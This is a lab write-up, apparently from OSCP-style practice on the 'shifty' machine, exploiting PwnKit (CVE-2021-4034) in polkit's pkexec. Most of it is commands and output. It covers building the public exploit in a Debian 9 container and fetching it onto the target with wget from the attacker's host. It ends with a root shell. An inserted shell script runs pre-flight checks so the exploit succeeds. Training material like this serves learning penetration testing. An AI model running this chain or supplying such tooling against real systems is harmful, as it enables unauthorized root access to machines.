CVE-2021-4034


PEAS has identified that the target system is vulnerable to CVE-2021-4034

A vulnerability classified as critical has been found in polkit (version unknown). It affects pkexec (/usr/bin/pkexec), the setuid-root helper polkit ships for running a command as another user. pkexec does not check for an empty argument list: when it is executed with argc == 0 it reads argv[1] from what is actually envp[0] and writes an attacker-controlled path back into the environment, which a local unprivileged user can turn into code execution as root. Using CWE to classify the problem gives CWE-284 (Improper Access Control): the product does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. Confidentiality, integrity and availability are all impacted.

Exploit


Exploit found online

jerry@shifty:/dev/shm$ cc
-bash: cc: command not found
jerry@shifty:/dev/shm$ gcc
-bash: gcc: command not found

No compiler found. Falling back to remote compilation. The caveat is that the exploit binary is dynamically linked, so it must be built against a glibc no newer than the target's: a binary built on a newer glibc dies on the target with a "version GLIBC_x.y not found" error from the loader. Check the target's glibc with ldd --version and pick a build image whose glibc is the same or older; that is why the container below is Debian 9 and the first thing checked inside it is its glibc version.

Docker Exploit Development


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name shifty debian:9       
 
root@ccdc86469513:/# ldd --version
ldd (Debian GLIBC 2.24-11+deb9u4) 2.24
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
 
root@ccdc86469513:/# tee /etc/apt/sources.list > /dev/null <<EOF
> deb http://archive.debian.org/debian/ stretch main contrib non-free
> deb http://archive.debian.org/debian/ stretch-proposed-updates main contrib non-free
> deb http://archive.debian.org/debian-security stretch/updates main contrib non-free
> EOF
root@ccdc86469513:/# apt update -y; apt install git make nano gcc gcc-multilib make -y

Setting up the environment

root@ccdc86469513:/# git clone https://github.com/berdav/CVE-2021-4034; cd CVE-2021-4034; make; cd ..; tar -czf CVE-2021-4034.tar.gz ./CVE-2021-4034; cp CVE-2021-4034.tar.gz /root/host/

Downloading, compiling & packaging the exploit
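Before shipping the tarball, it is worth confirming on the target that pkexec is actually there and setuid root, and that the target's glibc is at least as new as the one the binary was linked against (2.24 for the debian:9 container, per the ldd output above). The POSIX shell script below is an added example, not part of the original write-up or of the berdav repository; the function names and the assumption that the target provides ldd --version and pkexec --version (both standard on Debian-family systems) are mine. The version handling is general, so the same script works for any build image and target pair, not just debian:9.

```sh
#!/bin/sh
# Added example (not from the original write-up): pre-flight checks to run on the
# target before delivering a remotely compiled PwnKit binary.
# Assumes a POSIX sh and that the target exposes `ldd --version` and `pkexec --version`.

# Extract "major.minor" from the first line of `ldd --version` output.
# That line looks like: "ldd (Debian GLIBC 2.24-11+deb9u4) 2.24"
glibc_version_from_ldd() {
    printf '%s\n' "$1" |
        sed -n '1s/.*[[:space:]]\([0-9][0-9]*\.[0-9][0-9]*\)[[:space:]]*$/\1/p'
}

# True (exit 0) when dotted version $1 is <= $2, compared numerically field by
# field, so that 2.9 <= 2.24 holds (a plain string compare would get it wrong).
version_le() {
    a_major=${1%%.*}; b_major=${2%%.*}
    case $1 in *.*) a_minor=${1#*.} ;; *) a_minor=0 ;; esac
    case $2 in *.*) b_minor=${2#*.} ;; *) b_minor=0 ;; esac
    a_minor=${a_minor%%.*}; b_minor=${b_minor%%.*}   # ignore anything past major.minor
    [ "$a_major" -lt "$b_major" ] ||
        { [ "$a_major" -eq "$b_major" ] && [ "$a_minor" -le "$b_minor" ]; }
}

# Pre-flight on the target. $1 is the glibc the exploit was linked against
# (e.g. 2.24 for debian:9). Returns non-zero on any condition that would make
# the exploit fail, so it can be chained with && before the wget/tar step.
pwnkit_preflight() {
    build_glibc=$1
    pkexec_path=$(command -v pkexec 2>/dev/null) ||
        { echo "no pkexec in PATH"; return 1; }
    if [ -u "$pkexec_path" ]; then
        echo "pkexec: $pkexec_path is setuid ($(ls -l "$pkexec_path"))"
    else
        echo "pkexec: $pkexec_path is NOT setuid; PwnKit cannot escalate"; return 1
    fi
    echo "pkexec reports: $(pkexec --version 2>/dev/null)"
    target_glibc=$(glibc_version_from_ldd "$(ldd --version 2>/dev/null)")
    [ -n "$target_glibc" ] || { echo "could not determine target glibc"; return 1; }
    if version_le "$build_glibc" "$target_glibc"; then
        echo "glibc OK: built against $build_glibc, target has $target_glibc"
    else
        echo "glibc mismatch: built against $build_glibc, target has $target_glibc" \
             "(expect a 'version GLIBC_$build_glibc not found' loader error)"
        return 1
    fi
}

# Usage on the target:  sh preflight.sh 2.24
if [ $# -gt 0 ]; then pwnkit_preflight "$1"; fi
```

Run it from the same /dev/shm staging directory as the rest of the procedure; a non-zero exit means either no usable setuid pkexec or a glibc that is older than the build container's, in which case rebuild on an older base image rather than retrying the exploit.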

Exploitation


jerry@shifty:/dev/shm$ wget -q http://192.168.45.153/CVE-2021-4034.tar.gz; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

jerry@shifty:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
shifty
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:d3:9d brd ff:ff:ff:ff:ff:ff
    inet 192.168.219.59/24 brd 192.168.219.255 scope global ens192
       valid_lft forever preferred_lft forever

System-level compromise